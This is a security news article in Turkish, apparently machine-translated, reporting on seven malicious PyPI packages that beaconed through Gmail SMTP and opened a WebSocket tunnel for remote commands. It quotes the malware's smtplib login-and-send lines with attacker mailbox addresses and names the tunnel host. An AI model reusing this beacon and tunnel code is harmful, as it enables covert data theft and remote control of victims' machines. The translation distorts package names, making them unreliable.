Büyük bir tedarik zinciri güvenlik olayı, Socket’in tehdit araştırma ekibindeki araştırmacılar, Python Paket Endeksi’nde (PYPI) yayınlanan birbirine bağlı yedi kötü niyetli paket ortaya çıkarırken Python açık kaynak topluluğunu salladı.
Bu paketler Tabut kodes-prof, tabut kodu-net2, tabut kodu-net, tabut kodu-2022, tabut2022, tabut mezarı, Ve CFC-BSB-Gmail’in SMTP hizmetinden yararlanmak, gizli komut ve kontrol tünellerini oluşturmak ve saldırganların güvenliği ihlal edilmiş makinelerde keyfi komutlar yürütmelerini sağlamak için ustaca tasarlanmıştır.
Gmail’in SMTP’sinin Sofistike Kötüye Kullanımı
Bu paketleri PYPI’da bulunan tipik kötü amaçlı yazılımlardan ayıran şey, Gmail’in iletişim için Basit Posta Transfer Protokolü’ne (SMTP) güvenmeleridir.
.png
)
Bu, kötü amaçlı yazılımlar tarafından oluşturulan trafiğin, Gmail’in altyapısına doğal olarak güvenen en fazla güvenlik duvarı ve uç nokta algılama sistemlerini ortadan kaldırarak meşru e -posta trafiği olarak harmanlamasını sağlar.
Aşağıda, ortaya çıkan yedi kötü amaçlı Python paketinin her birini, kullanılan e -posta adreslerini ve SMTP hesaplarını, anahtar kod davranışlarını ve soruşturmadan önemli teknik ayrıntıları özetleyen yapılandırılmış bir tablo bulunmaktadır. Kırılmış kimlik bilgileri güvenlik açısından işaretlenmiştir.
| Paket adı | Anahtar kötü amaçlı kod/teknik |
| Tabut kodu | srv = smtplib.smtp_ssl (“smtp.gmail.com”, 465) srv.login (“sphacoffin@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| Tabut-net2 | srv.login (“hackingbsb@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| Tabut ağına | srv.login (“btcchain2@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| Tabut kodu-2022 | srv.login (“sphacoffin@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| Tabut2022 | srv.login (“sphacoffin@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| Tabutu | srv.login (“sphacoffin@gmail.com”, “[redacted]”) srv.sendmail (“sphacoffin@gmail.com”, “blockchain.bitcoins2020@gmail.com”, “Bok Incomin”) |
| CFC-BSB | Websocket tünelini WSS’ye: //open.jprq.live SMTP/E -posta veya Kimlik Bilgisi Eksfiltrasyonu yok |
Soket bulgularına göre, kurulum üzerine paketler, saldırgan tarafından kontrol edilen hesaplara (özellikle sphacoffin@gmail.com ve diğerleri) bağlı sert kodlanmış kimlik bilgilerini kullanarak Gmail sunucularına SSL şifreli bağlantılar kurar.
İlk mesajlar, kötü niyetli implantın aktif olduğunu onay olarak blockchain.bitcoins2020@gmail.com başka bir saldırgan posta kutusuna gönderilir.
Temel işlevsellik gizli bir tünel kurmaya odaklanır. İlk işaretten sonra, kötü niyetli modüller daha fazla talimat almak için güvenli bir WebSocket kanalı açar. Saldırgan daha sonra bu tünelden aşağıdakilerden yararlanabilir:
- Hassas verileri dışarı atın
- Keyfi kabuk komutlarını veya komut dosyalarını yürütün
- Hasat Kimlik Bilgileri veya Yönetici Panellerine Erişim
- Dosyaları mağdur ağlarına ve dışına aktarın
- Dahili ağlara daha fazla dönün
- Paket detayları ve zaman çizelgesi
Her paketin küçük varyasyonları vardı:
- Tabut kodu: İmplant ve Tünel Bilgilerini Saldırgana yönlendiren ilk saldırı modelini oluşturdu.
- Tabut-net2 ve tabut-codes-net: Saldırganın kalıcı çabalarını gösteren yeni Gmail hesapları ve küçük kod değişiklikleri kullanıldı.
- Coffin-Codes-2022, Coffin2022, tabut mezarı: Farklı PYPI girişlerinde yeniden kullanılan kimlik bilgileri ve iş akışı ile orijinal paketi işlevsel olarak yansıttı.
- CFC-BSB: En eski ve en az açık kötü niyetli, Mart 2021’e kadar uzanıyor. Doğrudan e-posta açığa çıkmasından yoksun olsa da, hala tünel onaylamasını kolaylaştırdı ve önemli riskler oluşturdu.
Saldırganın kimliğine ilişkin tek ipucu, kullanılan gmail adreslerinin bir avuçı ve yinelenen bitcoin ve Solana ile ilgili referanslardır, bu da önceki kripto hedefli saldırılarla olası bağlar gösterir.
Paketler o zamandan beri PYPI’dan çıkarıldı, ancak 2021’e kadar uzatılmış varlıkları, açık kaynak depolarını polislik zorluğunu ortaya koyuyor.
Açık kaynaklı tedarik zinciri saldırıları daha gizli ve yaratıcı hale geldikçe, farkındalık ve uyanıklık yazılım geliştirme yaşam döngüsünde yükselmelidir.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!